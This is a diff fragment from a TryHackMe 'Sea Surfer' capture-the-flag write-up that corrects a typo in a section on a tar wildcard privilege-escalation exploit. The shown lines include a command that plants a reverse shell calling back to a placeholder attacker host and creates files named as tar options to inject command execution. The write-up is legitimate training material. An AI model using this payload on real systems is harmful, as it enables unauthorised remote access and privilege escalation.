0x0m/writeups/tryhackme/sea_surfer/README.md

 tar -zcf /home/kyle/backups/invoices.tgz *
 ```

 In the script, we can see that it creates a backup in /home/kyle which we cannot access.
-We cannot do this as our current user, so it means that we may be able to escalate our priviliges with this.
+We cannot do this as our current user, so it means that we may be able to escalate our privileges with this.
 We can try to do a tar wildcard exploit.

 ```bash
 cd /var/www/internal/invoices; echo "/bin/bash -c 'bash -i >& /dev/tcp/KALI_IP/9999 0>&1'" > shell.sh; echo "" > "--checkpoint-action=exec=sh shell.sh"; echo "" > --checkpoint=1; chmod 777 shell.sh